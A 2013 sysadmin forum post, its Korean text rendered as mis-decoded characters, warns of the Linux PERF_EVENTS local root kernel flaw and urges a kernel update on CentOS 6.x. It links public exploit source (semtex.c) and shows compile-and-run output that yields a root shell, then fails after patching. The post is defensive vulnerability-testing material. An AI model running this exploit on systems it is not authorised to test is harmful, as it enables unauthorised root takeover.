½Ã½ºÅÛ°ü¸®ÀÚÀÇ ½°ÅÍ Ä¿ÇǴнº Ä¿ÇÇÇâÀÌ ³ª´Â *NIX
Ä¿ÇǴнº
½Ã½ºÅÛ/³×Æ®¿÷/º¸¾ÈÀ» ´Ù·ç´Â °÷
 FAQFAQ   °Ë»ö°Ë»ö   ¸â¹ö¸®½ºÆ®¸â¹ö¸®½ºÆ®   »ç¿ëÀÚ ±×·ì»ç¿ëÀÚ ±×·ì   »ç¿ëÀÚ µî·ÏÇϱâ»ç¿ëÀÚ µî·ÏÇϱâ 
 °³ÀÎ Á¤º¸°³ÀÎ Á¤º¸   ºñ°ø°³ ¸Þ½ÃÁö¸¦ È®ÀÎÇÏ·Á¸é ·Î±×ÀÎÇϽʽÿÀºñ°ø°³ ¸Þ½ÃÁö¸¦ È®ÀÎÇÏ·Á¸é ·Î±×ÀÎÇϽʽÿÀ   ·Î±×Àηα×ÀΠ

°¡ÀÔ¾øÀÌ ´©±¸³ª ±ÛÀ» ¾µ ¼ö ÀÖ½À´Ï´Ù. °øÁö»çÇ׿¡ ´ëÇÑ ´ñ±Û±îÁöµµ..
IT ÀÏÁ¤ New!
ÀÚµ¿È­ ÇÁ·ÎÁ§Æ®




BBS >> ¼³Ä¡, ¿î¿µ Q&A | ³×Æ®¿÷, º¸¾È Q&A | ÀÏ¹Ý Q&A || Á¤º¸¸¶´ç | AWS || ÀÚÀ¯°Ô½ÃÆÇ | ±¸Àα¸Á÷ || °øÁö»çÇ× | ÀÇ°ßÁ¦½Ã
root±ÇÇÑ È¹µæÇÏ´Â ¸®´ª½º Ä¿³Î Ãë¾àÁ¡

 
±Û ¾²±â   ´äº¯ ´Þ±â    Ä¿ÇǴнº, ½Ã½ºÅÛ ¿£Áö´Ï¾îÀÇ ½°ÅÍ °Ô½ÃÆÇ À妽º -> *NIX / IT Á¤º¸
ÀÌÀü ÁÖÁ¦ º¸±â :: ´ÙÀ½ ÁÖÁ¦ º¸±â  
±Û¾´ÀÌ ¸Þ½ÃÁö
truefeel
Ä«Æä °ü¸®ÀÚ


°¡ÀÔ: 2003³â 7¿ù 24ÀÏ
¿Ã¸° ±Û: 1277
À§Ä¡: ´ëÇѹα¹
¿Ã¸®±â¿Ã·ÁÁü: 2013.5.20 ¿ù, 5:38 pm    ÁÖÁ¦: root±ÇÇÑ È¹µæÇÏ´Â ¸®´ª½º Ä¿³Î Ãë¾àÁ¡ Àοë°ú ÇÔ²² ´äº¯
·ÎÄÿ¡¼­ root ID¸¦ ¾òÀ» ¼ö ÀÖ´Â Ä¿³Î Ãë¾àÁ¡ÀÌ ¹ß°ßµÇ¾ú´Ù. ÇØ´ç Ä¿³Î ¹öÀüÀº 2.6.37~3.8.9 ÀÌ´Ù.
±×·¯³ª CentOS 6.x(¶Ç´Â RHEL)ÀÇ Ä¿³Î 2.6.32¹öÀüÀº 2.6.27¿¡¼­ ¹éÆ÷ÆÃµÈ °ÍÀÌ Àִµ¥ ÇØ´ç Ãë¾àÁ¡±îÁö ¹éÆ÷ÆÃµÈ °ÍÀ¸·Î ¾Ë·ÁÁ³´Ù.
CentOS 6.x¹öÀüÀ» »ç¿ëÁßÀ̸é Ä¿³Î ¾÷µ¥ÀÌÆ®(Áö³­ÁÖ¿¡ Ä¿³ÎÆÐÄ¡°¡ ³ª¿È)¸¦ ¹Ýµå½Ã ÇؾßÇÑ´Ù.

* CentOS 6.x¿¡¼­ Ãë¾àÁ¡¾ø´Â ¹öÀü : 2.6.32-358.6.2.el6.x86_64 <-- ÆÐÄ¡ ¹øÈ£ -358.6.2°¡ ¹®Á¦ ¾øÀ½.

* Linux PERF_EVENTS Local Root

http://packetstormsecurity.com/files/121616/semtex.c
http://downloads.securityfocus.com/vulnerabilities/exploits/59846.c

Ä¿³Î Ãë¾àÁ¡ Å×½ºÆ® °á°ú´Ù. gcc ÄÄÆÄÀÏÇÒ ¶§ ¹Ýµå½Ã -O2 optimize ¿É¼ÇÀ» ³Ö°í Å×½ºÆ®ÇØ¾ß ÇÑ´Ù.

[ Ä¿³Î ÆÐÄ¡ Àü ]
Àοë:

$ gcc semtex.c
$ ./a.out
2.6.37-3.x x86_64
sd _at_ fucksheep.org 2010
a.out: semtex.c:81: main: Assertion `p = memmem(code, 1024, &needle, 8 )' failed.
ÁßÁöµÊ
$ gcc -O2 semtex.c <-- -O2 ¿É¼Ç ³Ö°í ÄÄÆÄÀÏ
$ ./a.out
2.6.37-3.x x86_64
sd _at_ fucksheep.org 2010
-sh-4.1# id
uid=0(root) gid=0(root) groups=0(root),501(true) <-- root±ÇÇÑ È¹µæ
-sh-4.1# exit
logout


[ Ä¿³Î ÆÐÄ¡ ÈÄ ( yum update kernel* ¸í·É ÈÄ ) ]
Àοë:

$ uname -r
2.6.32-358.6.2.el6.x86_64
$ ./a.out
a.out: a.c:51: sheep: Assertion `!close(fd)' failed.
ÁßÁöµÊ
$


¡Ø expolit ¼Ò½º¸¦ ¸µÅ©ÇÏ°í ½ÍÁö ¾Ê¾Ò´Ù. ÇÏÁö¸¸ ÀÌ¹Ì °ø°³°¡ ¸¹ÀÌ µÇ¾ú°í, SE°¡ Á÷Á¢ Ãë¾à¼ºÀ» Å×½ºÆ®Çϵµ·Ï ¸µÅ©¸¦ °É¾ú´Ù.
À§·Î
»ç¿ëÀÚ Á¤º¸ º¸±â ºñ¹Ð ¸Þ½ÃÁö º¸³»±â ±Û ¿Ã¸°ÀÌÀÇ À¥»çÀÌÆ® ¹æ¹®
ÀÌÀü ±Û Ç¥½Ã:   
±Û ¾²±â   ´äº¯ ´Þ±â    Ä¿ÇǴнº, ½Ã½ºÅÛ ¿£Áö´Ï¾îÀÇ ½°ÅÍ °Ô½ÃÆÇ À妽º -> *NIX / IT Á¤º¸ ½Ã°£´ë: GMT + 9 ½Ã°£(Çѱ¹)
ÆäÀÌÁö 1 Áß 1

 
°Ç³Ê¶Ù±â:  
»õ·Î¿î ÁÖÁ¦¸¦ ¿Ã¸± ¼ö ÀÖ½À´Ï´Ù
´ä±ÛÀ» ¿Ã¸± ¼ö ÀÖ½À´Ï´Ù
ÁÖÁ¦¸¦ ¼öÁ¤ÇÒ ¼ö ¾ø½À´Ï´Ù
¿Ã¸° ±ÛÀ» »èÁ¦ÇÒ ¼ö ¾ø½À´Ï´Ù
ÅõÇ¥¸¦ ÇÒ ¼ö ¾ø½À´Ï´Ù


Powered by phpBB © 2001, 2005 phpBB Group